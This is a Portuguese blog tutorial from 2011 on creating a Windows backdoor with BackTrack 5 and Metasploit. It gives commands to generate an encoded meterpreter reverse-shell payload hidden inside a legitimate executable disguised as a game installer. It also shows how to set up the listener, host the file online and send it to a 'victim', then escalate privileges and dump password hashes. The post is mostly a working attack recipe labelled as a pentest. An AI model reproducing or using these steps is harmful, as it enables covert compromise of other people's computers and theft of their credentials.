sábado, 17 de dezembro de 2011

BackTrack 5 - Metasploit x Windows

Um simples backdoor com o BT5 para realizar um pentest no windows
-
Vamos simular que o windows XP ( sp3 ) tenha o IP - 192.168.1.5 ( Para ver o ip digite ipconfig no prompt de comando )
O backtrack 5 tenha o IP - 192.168.1.6 ( Para ver o ip digite ifconfig no terminal )
-
Começando:

1 - Abra o terminal do Backtrack 5
2
- O código abaixo para gerar o arquivo.exe que irá fazer a conexão
entre os dois computadores através da própria shell do linux.


Código:

# msfpayload
windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=1234 R |
msfencode -t exe -x Desktop/file.exe -k -o Desktop/realfile.exe -c
x86/shikata_ga_nai -c 5


O comando acima pode ser alterado, exemplo:

# msfpayload
windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=5050 R |
msfencode -t exe -x /etc/instalar.exe -k -o Desktop/instalarjogo.exe -c
x86/shikata_ga_nai -c 5


Feito isso, irá gerar o .exe, deixe ele de lado por enquanto.

Agora no terminal digite:

# msfconsole

De a sequência de comandos:

use exploit/multi/handler
set meterpreter/reverse_tcp
set LHOST 192.168.1.6
set LPORT 1234 ( se vc já sabe usar, fica a escolha )
exploit
Deixa esse terminal de lado agora, e abra
o navegador, vá em algum site para hospedar o arquivo.exe que foi
gerado, megaupload ou depositfiles fica a sua escolha.

Depois
de hospedar envie para o windows xp ( vitima ), no momento que ela
executar veja agora o terminal no backtrack se a caso deu certo vai
aparecer o meterpreter >

-
meterpreter >
Ai será digitados uma sequência de comandos, veja as informações de cada uma delas até o hashdump.
ps
Veja o system32 - 1660
Agora digite alguns comandos:

migrate 1660
getuid
getsystem
getuid
sysinfo
hashdump

Os comandos são simples, como sysinfo mostrar a versão do windows e por ai vai, digite help para ver cada um. 

Gostou? Então copie esse post para seu Blog:

0 comentários: